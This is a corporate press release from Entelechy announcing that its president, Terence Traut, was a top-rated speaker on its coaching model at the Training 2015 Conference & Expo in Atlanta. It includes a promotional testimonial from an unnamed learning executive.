Terence Traut Among Top Speakers at Training 2015 Conference & Expo

Speaking on the topic of Coaching for Talent Development and Employee Engagement, Terence Traut, president of Entelechy – creators of Unleash Your Leadership Potential – was among the top-rated speakers at the Training 2015 Conference & Expo in Atlanta, GA.

Merrimack, NH, Feb 3, 2015

Training2015Terence Traut, Entelechy’s President, spoke on Coaching for Talent Development and Employee Engagement at this year’s Training 2015 Conference & Expo held in Atlanta, GA.  Originally scheduled for a single delivery, Terry presented twice, sharing Entelechy’s Coaching Model and inviting participants to practice the model in an engaging coaching exercise to experience the power of coaching.  This is the same model that Entelechy uses as the foundation for its award-winning Unleash Your Leadership Potential leadership/management development program and has been described as “simply elegant” by participants who speak to the model’s power and simplicity.

Coaching to develop talent and engage employees is, according to industry researcher, Josh Bersin, a key leadership skill for 2015.  Yet, according to Traut, “most coaching models and training don’t provide a practical, prescriptive tool for coaching.  Most training talks about how important it is to listen to the employee, to use questions, to display empathy, to focus on goals….  Interesting stuff, but not really useful, which is why most employee surveys indicate that their managers don’t coach them.”

The VP of Global Learning & Quality at a 70,000 employee organization agrees on the impact of coaching: “The initial return on our commitment to developing our leaders’ coaching skills is remarkable. In our pilot site, our performance six weeks following the initial implementation saw them move from the bottom quartile among our competitors to the #1 site, and they have maintained top quartile performance ever since.”
